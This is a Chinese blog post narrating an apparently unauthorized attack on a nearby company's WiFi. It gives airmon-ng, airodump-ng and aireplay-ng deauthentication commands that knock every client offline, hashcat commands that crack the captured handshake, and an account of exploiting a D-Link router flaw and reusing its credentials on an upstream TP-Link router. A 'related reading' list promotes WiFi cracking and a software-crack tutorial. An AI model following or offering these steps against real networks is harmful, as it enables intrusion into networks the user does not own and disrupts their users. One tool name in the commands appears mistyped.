破解路由器密码
工作之余,闲来无事,搞搞事情,不搞不知道,一搞还真搞了些东西,企业安全......呵呵!
由于之前一直在做路由器项目,今天来看看周围的WiFi是否安全,开启我的Kali,插上USB无线网卡,目测我的网卡是拓实的双频无线网卡,Realtek 8812au芯片,开始在Github上clone下一个驱动,一阵make安装后,发现无法设置为monitor混杂模式,dmesg看到崩溃,看来Github上的驱动不可取,Google一番,发现Kali执行命令下载即可:
sudo apt-get install realtek-rtl88xxau-dkms该驱动支持的芯片列表如下:
驱动安装完成后,开启usb无线网卡混杂模式:
iwconfig wlan0 mode monitor
airmon-ng check killairmon-ng start wlan0使用airodump-ng开始监听无线网络并抓取wifi握手包:
airodump-ng -w wifi1 --essid wifi1 --channel 11 wlan0这里我只监听抓包使用11号频道的热点wifi,因为目标wifi使用的是11频道。
如果想快一点抓取到握手包,需要用上aireplay-ng,该命令可以让使用wifi1热点的终端掉线重连,在重连过程中就可以抓取到握手包了:
aireplay-ng -0 0 -a 43:23:4F:31:A3:43 wlan0具体命令自行查看,我为了方便,会将所有连接wifi的终端强制掉线。
如上图,到此抓取到wifi握手包,下面就是对这个握手包进行破解。
破解握手包,我这里使用的是hashcat,在使用hashcat破解之前,需要对获取到握手包文件.cap文件进行转换,不然目前hashcat不支持破解.cap文件,无法识别,这里需要用到hashcat提供的工具包中的cao2hccapx.bin工具:
cao2hccapx.bin ./wifi1.cap output.hccapx这里的output.hccapx即是要破解的握手包文件:
hashcat64.bin -m 2500 --force -w 3 ./output.hccapx ./dicts/rockyou.txt这里rockyou.txt为破解使用的字典文件,最后跑完这个字典后,并没有破解出wifi密码,于是又试了另一个字典realuniq.lst,这次很快就我们得到了wifi的密码:
到此,就可以使用这个wifi热点了。
结束了吗?并没有。
访问该热点的路由器页面看看是什么路由器:
啊哈,是D-Link,我记得某某路由器有漏洞,所以搜索了一下,版本真是存在漏洞的版本,那就搞一下喽
有时候比较懒,写代码太费事,上Fiddler(或burpsuit)
很快,这个路由器被攻陷了,既然来了,就进去看看喽
原来上层还有一个路由器,访问看看是什么路由器:
原来是TP-Link,使用相同的账户密码登录试试,啊哈,还真能登录进去:
该公司的网管,你家老板有事找你......
第一个D-link的路由器我只是使用了第一个漏洞获取到路由器的登录密码,还有一个漏洞是在D-link上执行命令的漏洞,这里我也写了脚本搞了一下:
到此,本次搞事情到此结束!
相关阅读
原文地址为:极客君教你破解隔壁妹子的wifi密码,成功率高达90%首先,给大家推荐一个我自己维护的网站:开发者网址导航:http://www.dev666
星号密码一般分为窗口和网页两种,密码一般以“*”字符显示,也有些以其它字符比如圆点或#显示,在编程中可以设置任意字符为密码掩码。
如何开网店,怎么开淘宝网店?距离2016年还剩不到10天时间了,想要在新的一年完成互联网创业梦想吗,那么就赶紧加入到开网店的队伍中吧
PhotoShop CC2015(64位)下载链接和破解教程
photoshop如今有cc和cs两种版本,之前出了一个cs的破解教程和扣圆形图,有很多朋友说cc比cs好用的多,希望出个cc的下载链接和破解教程,
【原创】无线破解Aircrack-ng套件详解--airmon-ng与airo
一:Aircrack-ng详解 1.1 Aircrack-ng概述 Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之